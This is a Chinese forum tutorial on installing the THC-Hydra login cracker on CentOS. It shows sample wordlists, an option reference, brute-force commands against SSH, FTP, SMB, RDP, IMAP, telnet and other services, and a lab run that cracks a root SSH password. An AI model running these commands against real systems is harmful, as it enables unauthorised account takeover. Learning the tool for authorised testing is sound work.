设为首页 收藏本站
查看: 451|回复: 0

[经验分享] centos hydra 搭建

[复制链接]

尚未签到

发表于 2018-4-26 12:36:50 | 显示全部楼层 |阅读模式
  THC-HYDRA是一个支持多种网络服务的非常快速的网络登陆破解工具。这个工具是一个验证性质的工具,它被设计的主要目的是为研究人员和安全从业人员展示远程获取一个系统的认证权限是比较容易的
  实验环境
  centos6.5x64
  
  实验安装
  hydra-7.3.tar.gz
  

  软件安装
  yum install openssl-devel pcre-devel ncpfs-devel postgresql-devel libssh-devel subversion-devel
  tar zxvf hydra-7.3.tar.gz
  cd hydra-7.3
  ./configure
  make
  make install
  

  

  hydra -version
  Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only
  

  
  touch users.txt
  less users.txt
  root
  admin
  administrator
  test
  

  touch password.txt
  less password.txt
  1
  123
  123.com
  aabbcc
  systemadmin
  

  使用说明
  hydra  -R 继续从上一次进度接着破解。
       -S 采用SSL链接。
       -s PORT 可通过这个参数指定非默认端口。
       -l LOGIN 指定破解的用户,对特定用户破解。
       -L FILE 指定用户名字典。
       -p PASS 小写,指定密码破解,少用,一般是采用密码字典。
       -P FILE 大写,指定密码字典。
       -e ns 可选选项,n:空密码试探,s:使用指定用户和密码试探。
       -C FILE 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数。
-M FILE 指定目标列表文件一行一条。
       -o FILE 指定结果输出文件。
       -f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解。
       -t TASKS 同时运行的线程数,默认为16。
       -w TIME 设置最大超时的时间,单位秒,默认是30s。
       -v / -V 显示详细过程

  破解ssh        hydra -L users.txt -P password.txt -t 1 -vV -e ns 192.168.1.160 ssh
  
  破解ftp        hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV
                 hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV
  破解https      hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https
  破解teamspeak  hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak
  破解cisco      hydra -P pass.txt 10.36.16.18 cisco
                 hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable
  破解smb        hydra -l administrator -P pass.txt 10.36.16.18 smb
  破解pop3       hydra -l muts -P pass.txt my.pop3.mail pop3
  破解rdp        hydra ip rdp -l administrator -P pass.txt -V
  破解http-proxy hydra -l admin -P pass.txt http-proxy://10.36.16.18
  破解imap       hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
                 hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN
  破解telnet     hydra ip telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V
           
  hydra -L users.txt -P password.txt -t 1 -vV -e ns 192.168.1.160 ssh
  Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only
  Hydra (http://www.thc.org/thc-hydra) starting at 2016-04-12 17:30:48
[DATA] 1 task, 1 server, 35 login tries (l:5/p:7), ~35 tries per task

[DATA] attacking service ssh on port 22

[VERBOSE] Resolving addresses ... done

[ATTEMPT] target 192.168.1.160 - login "root" - pass "root" - 1 of 35 [child 0]

[ATTEMPT] target 192.168.1.160 - login "root" - pass "" - 2 of 35 [child 0]

[ATTEMPT] target 192.168.1.160 - login "root" - pass "1" - 3 of 35 [child 0]

  [22][ssh] host: 192.168.1.160   login: root   password: 1  密码破解成功
[ATTEMPT] target 192.168.1.160 - login "admin" - pass "admin" - 8 of 35 [child 0]

[ATTEMPT] target 192.168.1.160 - login "admin" - pass "" - 9 of 35 [child 0]

[ATTEMPT] target 192.168.1.160 - login "admin" - pass "1" - 10 of 35 [child 0]

[ATTEMPT] target 192.168.1.160 - login "admin" - pass "123" - 11 of 35 [child 0]

[ATTEMPT] target 192.168.1.160 - login "admin" - pass "123.com" - 12 of 35 [child 0]

[ATTEMPT] target 192.168.1.160 - login "admin" - pass "aabbcc" - 13 of 35 [child 0]

  

运维网声明 1、欢迎大家加入本站运维交流群:群②:261659950 群⑤:202807635 群⑦870801961 群⑧679858003
2、本站所有主题由该帖子作者发表,该帖子作者与运维网享有帖子相关版权
3、所有作品的著作权均归原作者享有,请您和我们一样尊重他人的著作权等合法权益。如果您对作品感到满意,请购买正版
4、禁止制作、复制、发布和传播具有反动、淫秽、色情、暴力、凶杀等内容的信息,一经发现立即删除。若您因此触犯法律,一切后果自负,我们对此不承担任何责任
5、所有资源均系网友上传或者通过网络收集,我们仅提供一个展示、介绍、观摩学习的平台,我们不对其内容的准确性、可靠性、正当性、安全性、合法性等负责,亦不承担任何法律责任
6、所有作品仅供您个人学习、研究或欣赏,不得用于商业或者其他用途,否则,一切后果均由您自己承担,我们对此不承担任何法律责任
7、如涉及侵犯版权等问题,请您及时通知我们,我们将立即采取措施予以解决
8、联系人Email:admin@iyunv.com 网址:www.yunweiku.com

所有资源均系网友上传或者通过网络收集,我们仅提供一个展示、介绍、观摩学习的平台,我们不对其承担任何法律责任,如涉及侵犯版权等问题,请您及时通知我们,我们将立即处理,联系人Email:kefu@iyunv.com,QQ:1061981298 本贴地址:https://www.yunweiku.com/thread-452311-1-1.html 上篇帖子: centos 5.8下搭建extmail服务的总结 下篇帖子: centos虚拟机启用网卡
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

扫码加入运维网微信交流群X

扫码加入运维网微信交流群

扫描二维码加入运维网微信交流群,最新一手资源尽在官方微信交流群!快快加入我们吧...

扫描微信二维码查看详情

客服E-mail:kefu@iyunv.com 客服QQ:1061981298


QQ群⑦:运维网交流群⑦ QQ群⑧:运维网交流群⑧ k8s群:运维网kubernetes交流群


提醒:禁止发布任何违反国家法律、法规的言论与图片等内容;本站内容均来自个人观点与网络等信息,非本站认同之观点.


本站大部分资源是网友从网上搜集分享而来,其版权均归原作者及其网站所有,我们尊重他人的合法权益,如有内容侵犯您的合法权益,请及时与我们联系进行核实删除!



合作伙伴: 青云cloud

快速回复 返回顶部 返回列表